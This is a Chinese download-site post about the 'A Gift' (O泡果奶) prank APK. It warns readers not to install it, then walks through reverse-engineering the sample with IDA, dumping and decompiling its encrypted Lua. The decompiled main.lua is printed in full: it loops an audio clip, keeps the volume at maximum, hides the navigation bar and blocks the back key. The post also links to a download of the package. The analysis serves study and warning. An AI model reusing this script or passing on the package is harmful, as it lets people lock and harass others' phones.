一份礼物安装包 O泡果奶软件下载链接地址

近日,一个名为“一个礼物”的文件在大学中传播开来,手机只要点开就会强制播放“o泡果奶”的魔性广告声,据说中招的机主都社会性死亡了。

1、这个o泡果奶的软件其实是没有安全隐患的,不过算是一个执行循环的脚本。

2、目前因为这个软件已经被炒火了,所以很难下载到o泡果奶软件,也不建议大家这时候去下载,因为事件火了,就会被有心人利用,植入真正的病毒木马,到时候很可能会使你的手机中毒,盗取到你的账号,甚至是支付宝密码等等。

3、所以为了你的财产安全,现在开始不要下载任何o泡果奶相关的软件和文件。

4、各个大学已经逐渐被o泡果奶的魔性文件击破,这种流氓软件会让你经历不可磨灭的尴尬瞬间,再次提醒不要瞎装来历不明的软件,apk安装包实在是太容易被改包了。

一份礼物安装包 O泡果奶软件下载链接地址插图

链接已经放到本文下方

下面为大家发一份O泡时间到APP分析

拿到样本之后,别急着安装运行,先看看它的目录结构。

一份礼物安装包 O泡果奶软件下载链接地址插图1

打开assets文件夹,看到有一个mp3文件以及两个加密后的lua脚本:

一份礼物安装包 O泡果奶软件下载链接地址插图2

运行app后会自动播放这个音频文件,先对它进行替换。
这里使用AU对该mp3进行静音处理后,重打包并签名。
(其实也可以替换成自己想要播放的音频)
找到加载lua的关键函数
众所周知,lua脚本需要加载,而在加载之前肯定是要先解密的,所以只要找到解密函数,然后就可以把解密后的lua脚本dump出来。
使用IDA打开libluajava.so,经过分析找到函数luaL_loadbufferx
luaL_loadbufferx的第二个参数是加密的字节数组,第三个参数是大小,第四个参数是lua文件位置。
程序在这个函数中加载加密lua脚本,其中对脚本进行了解密操作。
根据第四个参数我们可以区分目前加载的lua脚本名称,从而选择性地dump
(即在函数开头下断点,查看第四个参数内容)
luaL_loadbufferx函数伪代码如下:

一份礼物安装包 O泡果奶软件下载链接地址插图3

动态调试进行dump
IDA在第41行断下之后,运行python脚本dump即可

一份礼物安装包 O泡果奶软件下载链接地址插图4

此处的0xf4daff00, 0x3000需要替换成解密后字节的起始地址和长度
长度写大一点也没事,可以再用010Editor删除(所以我这写的0x3000)
分析lua
由于dump出来的lua是字节码,并不是源码形式。所以还需要反编译后才能查看源码。(使用unluac_2015_06_13.jar进行反编译)
init.lua中进行包名、版本号、主题、权限等配置

一份礼物安装包 O泡果奶软件下载链接地址插图5

主要功能在main.lua中完成:

require("import")
import("android.app.*")
import("android.os.*")
import("android.widget.*")
import("android.view.*")
import("android.view.View")
import("android.content.Context")
import("android.media.MediaPlayer")
import("android.media.AudioManager")
import("com.androlua.Ticker")
activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION |
View.SYSTEM_UI_FLAG_IMMERSIVE)
m = MediaPlayer()
m.reset()
m.setDataSource(activity.getLuaDir() .. "/0.mp3")
m.prepare()
m.start()
m.setLooping(true)
ti = Ticker()
ti.Period = 10
function ti.onTick()
activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
activity.getDecorView().setSystemUiVisibility(View.SYSTEM_UI_FLAG_HIDE_NAVIGATION |
View.SYSTEM_UI_FLAG_IMMERSIVE)
end
ti.start()
function onKeyDown(A0_0, A1_1)
if string.find(tostring(A1_1), "KEYCODE_BACK") ~= nil then
activity.getSystemService(Context.AUDIO_SERVICE).setStreamVolume(AudioManager.STREAM_MUSIC, 15, AudioManager.FLAG_SHOW_UI)
end
return true
end

先把mp3读取到内存中,然后播放音频并循环调节媒体音量至最大值,同时拦截了返回键。主要功能其实跟以前那个叫目力的app差不多。(不过今天这个apk的音频就太那啥了…)

下载链接:网盘下载

备用:一份礼物

防止大家误安装或者诱导别人下载,特意打包。

说明: 本站大部分资源来源于用户上传和网络收集,版权归原作者所有,如果您是原作者,如果本站损害了您的利益,请邮件联系我们删除! 本站资源仅作为学习及测试用,下载后请在24小时之内删除,请勿用于商业或其他非法用途,否则由此引发的法律纠纷及连带责任本站概不承担,商用请支持正版授权! 站长QQ:2604620834
每日源码 » 一份礼物安装包 O泡果奶软件下载链接地址
0 0 vote
Article Rating
Subscribe
提醒
guest
0 评论
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x